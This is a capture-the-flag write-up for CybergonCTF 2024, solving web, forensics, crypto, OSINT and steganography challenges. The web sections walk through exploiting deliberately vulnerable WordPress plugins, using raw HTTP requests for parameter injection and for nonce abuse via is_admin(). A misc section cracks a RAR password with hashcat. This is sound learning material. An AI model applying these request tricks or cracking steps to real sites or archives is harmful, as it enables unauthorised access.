CTF WriteUps

CybergonCTF 2024

Date: Dec 1, 2024
Tags: WEB, Digital Forensics, forensics, misc, CRYPTO, OSINT, Reconnaissance, FTK Imager, Autopsy, Registry Explorer, steg, mp4 steg, wav, wav steg, audio steg, Tenant ID, Tenant Name, DNS TXT Records, DNS SPF Records, steghide, corrupted image, magic bytes
Summary: Some writeups of CybergonCTF2024 Challenges
Updated: Dec 23, 2024 11:44 AM


Web:

Cybergon Blog:

  • It's a WordPress site, and we are able to register a new user
  • Registering as a new user and logging in
  • They provided a file, user-profile-enhancer.php. Analyzing the code:
<?php
/*
Plugin Name: User Profile Enhancer
Description: Adds various customization options to the user profile update functionality.
Version: 1.0
Author: mgthura
*/

function log_user_activity($user_id) {
    error_log("User ID {$user_id} updated their profile.");
}

function add_custom_profile_field($user) {
    echo '<h3>Custom Profile Settings</h3>';
    echo '<table class="form-table"><tr>';
    echo '<th><label for="custom_field">Custom Field</label></th>';
    echo '<td><input type="text" name="custom_field" id="custom_field" value="" class="regular-text"></td>';
    echo '</tr></table>';
}
add_action('show_user_profile', 'add_custom_profile_field');
add_action('edit_user_profile', 'add_custom_profile_field');

function process_custom_profile_field($user_id) {
    if (isset($_POST['custom_field'])) {
        update_user_meta($user_id, 'custom_field', sanitize_text_field($_POST['custom_field']));
    }
}
add_action('personal_options_update', 'process_custom_profile_field');
add_action('edit_user_profile_update', 'process_custom_profile_field');

function custom_admin_notice() {
    echo '<div class="notice notice-info"><p>Profile customization plugin is active!</p></div>';
}
add_action('admin_notices', 'custom_admin_notice');

function add_custom_capability_to_admin() {
    $admin = get_role('administrator');
    if ($admin && !$admin->has_cap('customize_theme')) {
        $admin->add_cap('customize_theme');
    }
}
add_action('admin_init', 'add_custom_capability_to_admin');

function update_dummy_option() {
    update_option('dummy_option', time());
}
add_action('admin_init', 'update_dummy_option');

function dummy_shortcode_function($atts) {
    return '<p>Dummy shortcode output!</p>';
}
add_shortcode('dummy_shortcode', 'dummy_shortcode_function');

function display_user_role_in_footer() {
    if (is_admin() && current_user_can('read')) {
        $current_user = wp_get_current_user();
        echo '<p style="text-align:center;">Your Role: ' . esc_html(implode(', ', $current_user->roles)) . '</p>';
    }
}
add_action('admin_footer', 'display_user_role_in_footer');

function custom_profile_update_hook($user_id) {
    if (isset($_POST['custom_option']) && is_array($_POST['custom_option']) && in_array('0', $_POST['custom_option'])) {
        $user = get_user_by('id', $user_id);
        $user->set_role('contributor');
    }
}
add_action('personal_options_update', 'custom_profile_update_hook');
add_action('edit_user_profile_update', 'custom_profile_update_hook');

function update_user_last_login($user_login, $user) {
    update_user_meta($user->ID, 'last_login', current_time('mysql'));
}
add_action('wp_login', 'update_user_last_login', 10, 2);

function debug_user_data() {
    if (isset($_GET['debug_user'])) {
        $user = wp_get_current_user();
        error_log(print_r($user, true));
    }
}
add_action('admin_init', 'debug_user_data');
  • The add_custom_capability_to_admin function adds the customize_theme capability to the administrator role
function add_custom_capability_to_admin() {
    $admin = get_role('administrator');
    if ($admin && !$admin->has_cap('customize_theme')) {
        $admin->add_cap('customize_theme');
    }
}
  • The code below runs on every profile update: if the POST body contains a custom_option array that includes '0', it sets that user's role to contributor
function custom_profile_update_hook($user_id) {
    if (isset($_POST['custom_option']) && is_array($_POST['custom_option']) && in_array('0', $_POST['custom_option'])) {
        $user = get_user_by('id', $user_id);
        $user->set_role('contributor');
    }
}
  • Trying to update the custom field from the profile
  • Viewing the request in Burp
POST /wp-admin/profile.php HTTP/1.1
Host: 46.250.232.141:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://46.250.232.141:8081/wp-admin/profile.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 332
Origin: http://46.250.232.141:8081
DNT: 1
Connection: keep-alive
Cookie: wordpress_aa3b0865494c08b9d4423e0b770d29b0=test%7C1733244407%7C2ADQWsziUOPzk36lQxfB1YEm1rS02LSuSsfCyOBBmLq%7C95a67175782654747e162b9a668f9db5cdb75f16466721e7d3c99ab0f7e54fb6; wordpress_ab6bf97384b852c21c54e3ac3d637df9=test%7C1734286002%7CZ26P2AZH3xl5ETC8QbIUN7AGpxLPVSOBRqrjbK7CHkh%7Ca2648879fd1a9897c1c50011ba539e88af2f8d899a7e157cdd1c68e2327de08f; wp-settings-time-6=1732974878; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1733071608; wordpress_logged_in_aa3b0865494c08b9d4423e0b770d29b0=test%7C1733244407%7C2ADQWsziUOPzk36lQxfB1YEm1rS02LSuSsfCyOBBmLq%7C49d8df2366f64722241583bc182606783c3340d9cff0837643f2c109af46fa2f; wp_lang=en_US; wp-settings-time-2=1733076405; wordpress_logged_in_ab6bf97384b852c21c54e3ac3d637df9=test%7C1734286002%7CZ26P2AZH3xl5ETC8QbIUN7AGpxLPVSOBRqrjbK7CHkh%7C5cfa3c473aff3e0a8444f4931055a0667567c164c9415e56ba6c0a0af8e0d422
Upgrade-Insecure-Requests: 1
Priority: u=0, i

_wpnonce=c53780692f&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=4d14849248&admin_color=fresh&admin_bar_front=1&user_login=test&first_name=&last_name=&nickname=test&display_name=test&email=&url=&description=&pass1=&pass2=&custom_field=administrator&action=update&user_id=2&submit=Update+Profile
  • The request doesn't contain the custom_option parameter that the check expects:
function custom_profile_update_hook($user_id) {
    if (isset($_POST['custom_option']) && is_array($_POST['custom_option']) && in_array('0', $_POST['custom_option'])) {
        $user = get_user_by('id', $user_id);
        $user->set_role('contributor');
    }
}
  • We need to add a custom_option array parameter containing the value 0
custom_field=administrator&custom_option[]=0
  • After sending the request and going back to the home page, we got the flag
http://46.250.232.141:8081/
  • The flag is
CYBERGON_CTF2024{w0rdpr3ss_vUlN_1s_FuN_4nd_3asy}

Cybergon Blog 2:

  • The application is very similar to Cybergon Blog 1
  • Reviewing the new file they provided, user-post-enhancer.php
<?php
/*
Plugin Name: User Post Enhancer
Description: A plugin to enhance user posts with additional functionality.
Version: 1.0
Author: mgthura
*/

if (!defined('ABSPATH')) {
    exit; // Exit if accessed directly
}

class CustomUserActions {
    public function __construct() {
        add_action('init', [$this, 'register_ajax_actions']);
        add_action('wp_enqueue_scripts', [$this, 'enqueue_scripts']);
        add_action('wp_ajax_generate_nonce', [$this, 'generate_nonce']);
        add_action('wp_ajax_nopriv_generate_nonce', [$this, 'generate_nonce']);
        add_action('wp_ajax_read_post_data', [$this, 'read_post_data']);
        add_action('wp_ajax_read_post', [$this, 'read_post']);
        add_action('wp_ajax_update_user_preferences', [$this, 'update_user_preferences']);
        add_action('wp_ajax_fetch_user_settings', [$this, 'fetch_user_settings']);
        add_action('wp_ajax_get_recent_posts', [$this, 'get_recent_posts']);
        add_action('wp_ajax_submit_feedback', [$this, 'submit_feedback']);
        add_action('wp_ajax_update_avatar', [$this, 'update_avatar']);
        add_action('wp_ajax_fetch_api_data', [$this, 'fetch_api_data']);
        add_action('wp_ajax_review_security_policies', [$this, 'review_security_policies']);
        add_action('wp_ajax_sync_server', [$this, 'sync_server']);
        add_action('wp_ajax_process_shortcode', [$this, 'process_shortcode']);
        add_action('wp_ajax_execute_background_task', [$this, 'execute_background_task']);
    }

    public function generate_nonce() {
        if (is_admin()) {
            $nonce = wp_create_nonce('read_post_data_nonce');
            wp_send_json_success(['nonce' => $nonce]);
        } else {
            wp_send_json_error(['message' => 'Unauthorized']);
        }
    }

    public function read_post() {
        $post_id = isset($_POST['post_id']) ? intval($_POST['post_id']) : 0;
        $post = get_post($post_id);
        if ($post && $post->post_status === 'publish') {
            wp_send_json_success(['post_data' => [
                'title' => $post->post_title,
                'content' => $post->post_content,
            ]]);
        } else {
            wp_send_json_error(['message' => 'Post not found or not published']);
        }
    }

    public function read_post_data() {
        check_ajax_referer('read_post_data_nonce', 'nonce');
        $post_id = isset($_POST['post_id']) ? intval($_POST['post_id']) : 0;
        $post = get_post($post_id);
        if (is_admin() && $post) {
            wp_send_json_success(['post_data' => [
                'title' => $post->post_title,
                'content' => $post->post_content,
            ]]);
        } else {
            wp_send_json_error(['message' => 'Unauthorized or post not found']);
        }
    }

    public function update_user_preferences() {
        $user_id = get_current_user_id();
        $prefs = ['theme' => 'light', 'notifications' => 'enabled', 'language' => 'en'];
        $updated = update_user_meta($user_id, 'preferences', $prefs);
        if ($updated) {
            wp_send_json_success(['message' => 'Preferences updated.', 'preferences' => $prefs]);
        } else {
            wp_send_json_error(['message' => 'Failed to update preferences.']);
        }
    }

    public function fetch_user_settings() {
        $user_id = get_current_user_id();
        $settings = [
            'email' => wp_get_current_user()->user_email,
            'timezone' => get_option('timezone_string', 'UTC'),
        ];
        if (!empty($settings)) {
            wp_send_json_success(['message' => 'Settings fetched successfully.', 'settings' => $settings]);
        } else {
            wp_send_json_error(['message' => 'Failed to fetch settings.']);
        }
    }

    public function get_recent_posts() {
        $posts = get_posts(['numberposts' => 5, 'post_status' => 'publish']);
        $data = array_map(function ($post) {
            return ['title' => $post->post_title, 'id' => $post->ID];
        }, $posts);
        if ($data) {
            wp_send_json_success(['message' => 'Recent posts retrieved.', 'posts' => $data]);
        } else {
            wp_send_json_error(['message' => 'No posts available.']);
        }
    }

    public function submit_feedback() {
        $feedback = isset($_POST['feedback']) ? sanitize_text_field($_POST['feedback']) : '';
        $feedback_id = wp_insert_post([
            'post_title' => 'User Feedback',
            'post_content' => $feedback,
            'post_status' => 'pending',
            'post_type' => 'feedback',
        ]);
        if ($feedback_id) {
            wp_send_json_success(['message' => 'Feedback submitted successfully.', 'id' => $feedback_id]);
        } else {
            wp_send_json_error(['message' => 'Failed to submit feedback.']);
        }
    }

    public function update_avatar() {
        $avatar_id = isset($_POST['avatar_id']) ? intval($_POST['avatar_id']) : 0;
        $user_id = get_current_user_id();
        if ($avatar_id && $user_id) {
            update_user_meta($user_id, 'avatar', $avatar_id);
            wp_send_json_success(['message' => 'Avatar updated.', 'avatar_id' => $avatar_id]);
        } else {
            wp_send_json_error(['message' => 'Invalid avatar or user.']);
        }
    }

    public function fetch_api_data() {
        $api_url = 'https://catfact.ninja/fact';
        $response = wp_remote_get($api_url);
        $body = wp_remote_retrieve_body($response);
        if ($body) {
            wp_send_json_success(['message' => 'Data fetched from API.', 'data' => json_decode($body)]);
        } else {
            wp_send_json_error(['message' => 'Failed to fetch data from API.']);
        }
    }

    public function review_security_policies() {
        wp_send_json_success(['message' => 'Security policies reviewed.']);
    }

    public function sync_server() {
        wp_send_json_success(['message' => 'Server synchronization complete.']);
    }

    public function process_shortcode() {
        wp_send_json_success(['message' => 'Shortcode processed.', 'shortcode' => '[example_shortcode]']);
    }

    public function execute_background_task() {
        wp_send_json_success(['message' => 'Background task completed.']);
    }
}

new CustomUserActions();
  • This function reads a post by its ID
public function read_post_data() {
    check_ajax_referer('read_post_data_nonce', 'nonce');
    $post_id = isset($_POST['post_id']) ? intval($_POST['post_id']) : 0;
    $post = get_post($post_id);
    if (is_admin() && $post) {
        wp_send_json_success(['post_data' => [
            'title' => $post->post_title,
            'content' => $post->post_content,
        ]]);
    } else {
        wp_send_json_error(['message' => 'Unauthorized or post not found']);
    }
}
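  • Note that it checks a nonce with check_ajax_referer, so we first need to obtain a valid one
  • The code has a function that generates this nonce. Both functions gate on is_admin(), which only reports whether the request targets an admin screen (true for any admin-ajax.php request) and says nothing about the user's role
public function generate_nonce() {
    if (is_admin()) {
        $nonce = wp_create_nonce('read_post_data_nonce');
        wp_send_json_success(['nonce' => $nonce]);
    } else {
        wp_send_json_error(['message' => 'Unauthorized']);
    }
}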
  • First register and log in as a user
  • Now we have to generate a nonce using the action generate_nonce
http://46.250.232.141:8082/wp-admin/admin-ajax.php?action=generate_nonce
  • Using the generated nonce, we can now access any post using the action read_post_data
POST /wp-admin/admin-ajax.php?action=read_post_data HTTP/1.1
Host: 46.250.232.141:8082
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: wordpress_ab6bf97384b852c21c54e3ac3d637df9=test%7C1734280291%7CtMiiCL9dcuPcej4M8L8hcroZaUhYSGXF27sY5JpWYdP%7Cd6ba930c8d686559be7b8a6af8db427ead1c200596db02d69489ad05855cc080; wordpress_aa3b0865494c08b9d4423e0b770d29b0=test%7C1733244407%7C2ADQWsziUOPzk36lQxfB1YEm1rS02LSuSsfCyOBBmLq%7C95a67175782654747e162b9a668f9db5cdb75f16466721e7d3c99ab0f7e54fb6; wp-settings-time-6=1732974878; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1733071608; wordpress_logged_in_ab6bf97384b852c21c54e3ac3d637df9=test%7C1734280291%7CtMiiCL9dcuPcej4M8L8hcroZaUhYSGXF27sY5JpWYdP%7C0b77f681720f52823e284e72140abd18bbc85eaa84de7fd7b005439db5d956c9; wp-settings-time-2=1733070777; wordpress_logged_in_aa3b0865494c08b9d4423e0b770d29b0=test%7C1733244407%7C2ADQWsziUOPzk36lQxfB1YEm1rS02LSuSsfCyOBBmLq%7C49d8df2366f64722241583bc182606783c3340d9cff0837643f2c109af46fa2f
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

nonce=34126cec0f&post_id=5
  • The flag is
CYBERGON_CTF2024{W0rdPr3ss_1s_FuN_W4s_1t?}
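
The review check that both Cybergon Blog challenges come down to, as an added Python example (not part of the original writeup or the challenge code): a small static audit that flags handlers which change a role or rely on is_admin() without any current_user_can() call. The rule names, the regex heuristics and the abridged SAMPLE_PHP are assumptions made for illustration.

```python
import re

# Constructed sample: handlers excerpted (abridged) from the two plugins quoted above.
SAMPLE_PHP = r"""
function display_user_role_in_footer() {
    if (is_admin() && current_user_can('read')) {
        $current_user = wp_get_current_user();
    }
}
function custom_profile_update_hook($user_id) {
    if (isset($_POST['custom_option']) && is_array($_POST['custom_option']) && in_array('0', $_POST['custom_option'])) {
        $user = get_user_by('id', $user_id);
        $user->set_role('contributor');
    }
}
public function generate_nonce() {
    if (is_admin()) {
        $nonce = wp_create_nonce('read_post_data_nonce');
        wp_send_json_success(['nonce' => $nonce]);
    } else {
        wp_send_json_error(['message' => 'Unauthorized']);
    }
}
public function read_post_data() {
    check_ajax_referer('read_post_data_nonce', 'nonce');
    $post = get_post(isset($_POST['post_id']) ? intval($_POST['post_id']) : 0);
    if (is_admin() && $post) {
        wp_send_json_success(['post_data' => ['title' => $post->post_title]]);
    } else {
        wp_send_json_error(['message' => 'Unauthorized or post not found']);
    }
}
"""

FUNC_RE = re.compile(r"function\s+(\w+)\s*\([^)]*\)\s*\{")
HAS_CAP_CHECK = re.compile(r"\bcurrent_user_can\s*\(")
RULES = [
    # A role is changed, but the handler never asks whether the caller may do that.
    ("role-change-without-capability-check", re.compile(r"->\s*(?:set_role|add_role)\s*\(")),
    # is_admin() is true for every wp-admin request (admin-ajax.php included), whoever sends it.
    ("is_admin-used-as-authorization", re.compile(r"\bis_admin\s*\(")),
]


def iter_functions(src):
    """Yield (name, body) per named PHP function; braces inside string literals are ignored."""
    for m in FUNC_RE.finditer(src):
        depth, i, quote = 1, m.end(), None
        while i < len(src) and depth:
            ch = src[i]
            if quote:
                if ch == "\\":
                    i += 1  # skip the escaped character
                elif ch == quote:
                    quote = None
            elif ch in "'\"":
                quote = ch
            elif ch == "{":
                depth += 1
            elif ch == "}":
                depth -= 1
            i += 1
        yield m.group(1), src[m.end():i - 1]


def audit(src):
    """Return (function, rule) pairs for handlers that match a rule and lack current_user_can()."""
    findings = []
    for name, body in iter_functions(src):
        if HAS_CAP_CHECK.search(body):
            continue
        findings += [(name, rule) for rule, pattern in RULES if pattern.search(body)]
    return findings


if __name__ == "__main__":
    for name, rule in audit(SAMPLE_PHP):
        print(f"{name}: {rule}")
```

A hit is a prompt for manual review, not proof of a bug: the heuristic cannot see capability checks made by a caller.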
 

Digital Forensics:

  • I got 15 segment files (.E01, .E02, ...), so I used FTK Imager to merge them
  • You can watch this video just in case → click here

Warmup:

  • Extracting the hives from the location below using Autopsy
C:\Windows\System32\config\
  • Then using Registry Explorer to view the registry
  • After some research, we found that the time zone can be read from the registry key below
SYSTEM\ControlSet001\Control\TimeZoneInformation
  • We got the time zone as Singapore Standard Time with a bias of -480, which is the offset in minutes from UTC. Windows defines Bias as UTC minus local time, so -480 means UTC+08:00
CYBERGON_CTF2024{UTC+08:00 Singapore Standard Time}
  • But for some reason, I was not getting the right flag. Checking my timezone settings, I found the right format
CYBERGON_CTF2024{UTC+08:00 Kuala Lumpur, Singapore}

Welcome - 1:

  • Opening the Solid whole image in Autopsy and running all the modules
  • Just clicking the data source, under Data Artifacts, we got the Device Name and the Device Owner's Name
  • The final flag is
CYBERGON_CTF2024{White-Party, SEAN JOHN COMBS}

Welcome - 2:

  • In Autopsy, I was checking the Web Cookies and found the c_user value, which is a user ID
  • Now we need to find the Bio status
  • We can view the Facebook profile with c_user
https://www.facebook.com/profile.php?id=61567849079733
  • We got the bio as East Coast Rapper
  • The final flag is
CYBERGON_CTF2024{61567849079733, East Coast Rapper}

Welcome - 3:

  • When browsing around Autopsy and clicking through different files, I found the details of the OS Account
  • The final flag is
CYBERGON_CTF2024{Ko Toke Gyi}

Sleep Timeout:

  • After a lot of research and study, I found the registry key where the sleep power settings are saved
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20
  • Using Registry Explorer to browse the hive for the System standby timeout setting
  • We need to find the active setting
  • To find the ActivePowerScheme, we need to check the registry key below
SYSTEM\ControlSet001\Control\Power\User\PowerSchemes
  • We can see the active power scheme, which is Balanced (recommended)
  • Now we can get the values DCSettingIndex and ACSettingIndex
  • DCSettingIndex applies when running on battery and ACSettingIndex when plugged in
  • Now we need to convert this to seconds
  • The final flag is
CYBERGON_CTF2024{300, 60}
 

Misc:

Triple Quiz:

  • It's a RAR file and it asked for a password, so we need to crack it first
  • Converting the RAR to a hash
rar2john Triple_Quiz.rar > hash
  • Using hashcat with wordlist rockyou.txt to crack it
hashcat hash rockyou.txt
  • We got the password as ICEMAN
  • Now we get a .wav file; listening to it, it looks like Morse code
  • So we need to convert from Morse audio using this online tool
  • We got these values
6 666 777 7777 33 9 444 8 44 8 66 444 66 33
  • Using that to decode, we got the flag
  • The final flag is
CYBERGON_CTF2024{MORSEWITHTNINE}

Your Favorite Song:

  • We got an mp4 file
  • Opening and playing it, it's the APT APT song by Bruno Mars and Rose
  • So according to the description, the password is
apartment
  • Trying to extract using binwalk
binwalk -e song.mp4
  • Moving into the directory, we are able to find a zip file
  • Now extracting it with the password apartment
  • We got metadata.txt, which had the flag
  • The flag is
CYBERGON_CTF2024{Y0u_g07_r053}

Rules:

  • The first part of the flag we got from the Discord rules channel
  • Decoding that, we get
Flag Part1 > d1sc0rd_
  • The second part of the flag we got from the rules page on the website
Flag Part2 > p0rt4l
  • The final flag is
CYBERGON_CTF2024{d1sc0rd_p0rt4l_w3b}

Zip Zap:

  • It is zipped 500 times
  • Each time, the password is in the filename inside the zip file
  • In this case, ' is the password, and so on
  • Since the password changes each time, we need to script it anyway
import os
import subprocess
import re
import sys

# Initial ZIP file to start with
current_zip = "487. This is the password - b.zip"

while os.path.isfile(current_zip):
    print(f"Processing: {current_zip}")
    try:
        # List the contents of the current ZIP file
        result = subprocess.run(["7z", "l", current_zip], capture_output=True, text=True)
        if result.returncode != 0:
            print(f"Error: Failed to list contents of {current_zip}. Exiting.")
            sys.exit(1)

        # Extract all the inner file names from the 7z output
        inner_files = re.findall(r"(\d+\. This is the password - .+\.zip)", result.stdout)
        if not inner_files:
            print(f"Error: Could not find any inner files in {current_zip}. Exiting.")
            sys.exit(1)

        # Select the last inner file (which should be the next ZIP file)
        inner_file = inner_files[-1]  # Take the last match
        print(f"Inner file: {inner_file}")

        # Extract the password from the inner file name
        password_match = re.search(r"(?<=This is the password - )(.*?)\.zip", inner_file)
        if not password_match:
            print(f"Error: Could not extract the password from {inner_file}. Exiting.")
            sys.exit(1)
        password = password_match.group(1)  # Extract the matched password
        print(f"Password: {password}")

        # Extract the current ZIP file using the password
        print(f"Extracting {current_zip} with password: {password}")
        result = subprocess.run(["7z", "x", current_zip, f"-p{password}"], capture_output=True, text=True)
        if result.returncode != 0:
            print(f"Error: Extraction failed for {current_zip} with password: {password}. Exiting.")
            print(result.stderr)
            sys.exit(1)

        # Update the current ZIP file for the next iteration
        current_zip = inner_file
        print(f"Next file to process: {current_zip}")
    except Exception as e:
        print(f"An unexpected error occurred: {e}")
        sys.exit(1)

print("All ZIP files have been successfully processed!")
  • At last we got the flag!
  • Yo, but WTF!
  • Asking the support, they say to analyze better
  • Then I found out that some of the password characters are the password
ls | awk -F '- ' '{print $2}' | sed 's/.zip$//' | tr -d '\n'
  • We used the above command to get the flag
CYBERGON_CTF2024{y0U_g07_r341_F14g}
 

Crypto:

Warm Up:

  • We got 1s and 0s
  • Then we applied From_Binary('Space') and From_Hex('Space'), put the output into cipher-identifier, and tried each suggested result one by one
  • We got the flag when we used Base 92 encoding
CYBERGON_CTF2024{b45392_h3x_b1n4ry}

Warm Up 1:

  • Here, the first part is Brainfuck and the second part is Whitespace

Flag (Part 1):

  • Trying to decode using Brainfuck, we got the first part of the flag
br41nfuck_0r_

Flag (Part 2):

  • Trying to decode using Whitespace, we got the second part of the flag
wh1t35p4c3?
  • The final flag is
CYBERGON_CTF2024{br41nfuck_0r_wh1t35p4c3?}

I Love Poetry:

  • I am able to see the poem, with an encoded string at the end
  • Using CyberChef to decode it; it's actually Base64, and we get this
11:1 14:7 1:3 1:4 7:5 14:2 3:3
  • After further analysis, it's the line and the word from the poem
  • I got the final flag
CYBERGON_CTF2024{Haveyoueverheardthepoemcipher}

Chill Bro:

  • We got this image
  • We got the flag
CYBERGON_CTF2024{TAKEABREAKBROLETSDANCE}

E45y p345y:

  • Identified it as a Rail Fence Cipher
  • Using CyberChef to decode it, trying different keys and adjusting the offset, we got the flag
CYBERGON_CTF2024{R4!1_f3Nc3_C!pH3r_KrUb}
 

OSINT:

Vacation:

  • They provided an image
  • Running a Google reverse image search on it
  • One of the images looks similar, so searching for the place
muong thanh bai chay hotel
  • The flag was not correct, but I was pretty sure the place was
Ha Long, Vietnam
  • Through further OSINT I found this
  • The final flag is
CYBERGON_CTF2024{Muong Thanh Luxury Ha Long Centre Hotel, Ha Long, Vietnam}

Favorite Journal:

  • We got this image
  • After some reverse image searching, I found the name of the journal: Shwe Thway
  • The published date is 4-1-1969
  • The printing house is Sarpay Beikman
  • Got the first edition, from this and this, checking the last page
  • Translated it from Burmese to English
  • Found it on the last page
CYBERGON_CTF2024{4-1-69_0032}

The Stadium:

  • We got this image
  • Reverse image searching, we found it's Centre Bell
  • But the other details were wrong; we know it's Centre Bell in Canada
  • Searching Google for hockey stadium in canada, we got this wiki
  • Which gave all the info
  • The final flag is
CYBERGON_CTF2024{Montreal_Quebec_21700_1996}

The Pagoda:

  • Reverse image searching
  • Locate the position of the Ananda Temple donation center
  • Use dcode to get the approximate what3words location
  • Take the top left corner of the donation centre
  • Then, to find the Buddhas, we used this wiki
  • We got the flag
CYBERGON_CTF2024{doorstops.overthrows.folder_4_Gautama_Kakusandha_Kassapa_Konagamana}

The Train & The Bridge:

  • We got this image
  • Reverse image searching, we got this
  • We found the built year, which is 1969
  • Then we got a video
  • Reverse searching, we found it's the Goteik Viaduct
  • After further OSINT, we found the video on YouTube
  • Bridge video published: 9 May 2019
  • The final flag is
CYBERGON_CTF2024{1969_gokteik_09-05-2019}

History Repeats Itself:

  • We got this image
  • Reverse image searching, we found this resource
  • This disclosed the year when it happened
  • Finally we got the flag
CYBERGON_CTF2024{February_12_1947}

The Statue:

  • They provided an image
  • Reverse image searching, we got this
  • Searching on the map, we got the coordinates
  • The final flag is
CYBERGON_CTF2024{22.0804, 95.2893}
 

Reconnaissance:

Validation:

  • Note: TXT records might also contain SPF records, so we need to include them as well

Uncover:

  • This gave us the tenant name
CYBERGON_CTF2024{goddamnit2024.onmicrosoft.com}

Secure Life:

  • We are given a certificate.der file
  • We view the information about the certificate using openssl
openssl x509 -inform der -in certificate.der -text
  • Therefore the flag is
CYBERGON_CTF2024{2039:11:24:20:38:00}
 

STEGANO:

Invisible:

  • We got some common passwords
null winteriscoming getyourflag winteriscominggetyourflag
  • Using steghide and trying to extract files using the gained passwords
steghide extract -sf challenge1.jpg -p getyourflag
  • We got the flag
CYBERGON_CTF2024{n07h1ng_5t4ys_h1dd3n}

Truesight:

  • The image could not be opened and might be corrupted, so opening it in hexedit
  • The magic bytes are missing, so inserting 8 bytes to add the magic bytes
  • Adding the magic bytes accordingly for PNG
89 50 4E 47 0D 0A 1A 0A
  • Then, downloading the file, we got the flag
  • The flag is
CYBERGON_CTF2024{y0u_g07_7h3_r!gh7_s1gn5}
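
The Truesight repair as an added Python example (not from the original writeup): it restores the 8-byte PNG signature whether it was stripped, as in this challenge, or overwritten in place, which generalizes the case here, and then checks every chunk's CRC to confirm nothing else is damaged. The sample PNG is constructed in the code, and the function names are illustrative.

```python
import struct
import zlib

PNG_SIGNATURE = bytes.fromhex("89504E470D0A1A0A")
IHDR_START = struct.pack(">I", 13) + b"IHDR"  # IHDR is always the first chunk, 13 bytes long


def repair_png_signature(data: bytes) -> bytes:
    """Return data with a valid 8-byte PNG signature in front of the IHDR chunk."""
    if data.startswith(PNG_SIGNATURE):
        return data
    if data.startswith(IHDR_START):        # signature stripped: prepend it
        return PNG_SIGNATURE + data
    if data[8:16] == IHDR_START:           # signature overwritten: replace it
        return PNG_SIGNATURE + data[8:]
    raise ValueError("IHDR not found at offset 0 or 8; damage goes beyond the signature")


def walk_chunks(data: bytes):
    """Return [(chunk_type, length, crc_ok), ...] for a PNG that has its signature."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("missing PNG signature")
    chunks, pos = [], len(PNG_SIGNATURE)
    while pos < len(data):
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length            # header (8) + body + CRC (4)
        if end > len(data):
            raise ValueError("truncated chunk")
        body = data[pos + 8:end - 4]
        (stored_crc,) = struct.unpack(">I", data[end - 4:end])
        # The CRC covers the chunk type and body, not the length field.
        chunks.append((ctype.decode("latin-1"), length, zlib.crc32(ctype + body) == stored_crc))
        pos = end
        if ctype == b"IEND":
            break
    return chunks


def _chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def make_sample_png() -> bytes:
    """Constructed sample: a valid 1x1 8-bit grayscale PNG."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")      # filter byte + one pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


if __name__ == "__main__":
    damaged = make_sample_png()[8:]        # signature removed, as in the challenge file
    for ctype, length, ok in walk_chunks(repair_png_signature(damaged)):
        print(ctype, length, "CRC ok" if ok else "CRC MISMATCH")
```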